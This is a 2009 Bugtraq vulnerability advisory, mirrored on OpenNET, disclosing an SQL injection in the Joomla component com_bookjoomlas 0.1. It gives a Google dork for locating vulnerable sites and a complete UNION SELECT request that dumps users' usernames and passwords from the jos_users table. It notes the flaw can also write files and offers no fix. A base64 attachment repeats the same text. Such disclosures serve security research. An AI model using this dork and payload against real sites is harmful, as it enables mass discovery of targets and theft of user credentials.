The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Joomla Component com_bookjoomlas SQL Injection Vulnerability


<< Previous INDEX Search src / Print Next >>
Date: Mon, 6 Apr 2009 11:13:44 +0200
Subject: Joomla Component com_bookjoomlas SQL Injection Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: multipart/mixed; boundary=001636c5a87e5a4cc40466df51c0
X-Virus-Scanned: antivirus-gw at tyumen.ru

--001636c5a87e5a4cc40466df51c0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Joomla Component com_bookjoomlas
[+] Version: 0.1
[+] Website: http://www.alikonweb.it

[+] Bugs: [A] SQL Injection

[+] Exploitation: Remote
[+] Dork: inurl:"index.php?option=com_bookjoomlas"
[+] Date: 06 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] SQL Injection


[-] Security risk: low
[-] File affected: sub_commententry.php

This bug allows a privileged user to view username
and password of a registered user. Like all SELECT
vulnerable queries, this can be manipulate to write
files on system.


*************************************************

[+] Code


- [A] SQL Injection


http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1
UNION ALL SELECT
1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16
FROM jos_users


*************************************************

[+] Fix

No fix.


*************************************************

--
Salvatore "drosophila" Fresta
CWNP444351

--001636c5a87e5a4cc40466df51c0
Content-Type: text/plain; charset=US-ASCII; 
        name="Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability-06042009.txt"
Content-Disposition: attachment; 
        filename="Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability-06042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ft6y328a0

KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBKb29tbGEgQ29tcG9uZW50IGNvbV9ib29ram9vbWxhcwpbK10gVmVyc2lvbjog
MC4xClsrXSBXZWJzaXRlOiBodHRwOi8vd3d3LmFsaWtvbndlYi5pdAoKWytdIEJ1Z3M6IFtBXSBT
UUwgSW5qZWN0aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERvcms6IGludXJsOiJp
bmRleC5waHA/b3B0aW9uPWNvbV9ib29ram9vbWxhcyIKWytdIERhdGU6IDA2IEFwciAyMDA5Cgpb
K10gRGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhv
cjogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJv
c29waGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBCdWdzCgoK
LSBbQV0gU1FMIEluamVjdGlvbgoKWy1dIFNlY3VyaXR5IHJpc2s6IGxvdwpbLV0gRmlsZSBhZmZl
Y3RlZDogc3ViX2NvbW1lbnRlbnRyeS5waHAKClRoaXMgYnVnIGFsbG93cyBhIHByaXZpbGVnZWQg
dXNlciB0byB2aWV3IHVzZXJuYW1lIAphbmQgcGFzc3dvcmQgb2YgYSByZWdpc3RlcmVkIHVzZXIu
IExpa2UgYWxsIFNFTEVDVCAKdnVsbmVyYWJsZSBxdWVyaWVzLCB0aGlzIGNhbiBiZSBtYW5pcHVs
YXRlIHRvIHdyaXRlIApmaWxlcyBvbiBzeXN0ZW0uCgoKKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIENvZGUKCgotIFtBXSBTUUwgSW5qZWN0aW9u
CgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP29wdGlvbj1jb21fYm9va2pvb21s
YXMmSXRlbWlkPTI2JmZ1bmM9Y29tbWVudCZnYmlkPS0xIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLE5V
TEwsNCxOVUxMLDYsNyxOVUxMLDksQ09OQ0FUKHVzZXJuYW1lLDB4M2EscGFzc3dvcmQpLDExLDEy
LDEzLDE0LDE1LDE2IEZST00gam9zX3VzZXJzCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio=
--001636c5a87e5a4cc40466df51c0--


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру